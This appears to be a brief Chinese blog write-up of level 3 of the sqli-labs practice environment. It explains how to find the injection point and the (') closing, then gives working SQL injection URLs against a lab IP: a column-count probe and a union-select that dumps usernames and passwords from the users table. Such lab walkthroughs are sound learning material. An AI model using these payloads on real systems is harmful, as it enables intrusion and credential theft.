Less-3

Less-3

 

第三关：Please input the ID as parameter with numeric value 

（1）判断注入点

正常显示：

 

加入特殊字符：

 

 

根据报错信息可以知道，闭合方式为   （'id')

 

 

（2）开始注入

 

#查询字段数
http://192.168.88.133/mysqli-labs/Less-3/?id=1') order by 3 --+

#方式和前两关一样，可以使用联合查询注入
#参考第一关https://www.cnblogs.com/stickonit/p/16049775.html

#用户信息注入
http://192.168.88.133/mysqli-labs/Less-3/?id=-1') union select 1,group_concat(username,0x3a,password,0x3c,0x62,0x72,0x2f,0x3e),3  from users --+ 

 

 

 

 

 

注：欢迎指正和交流~~~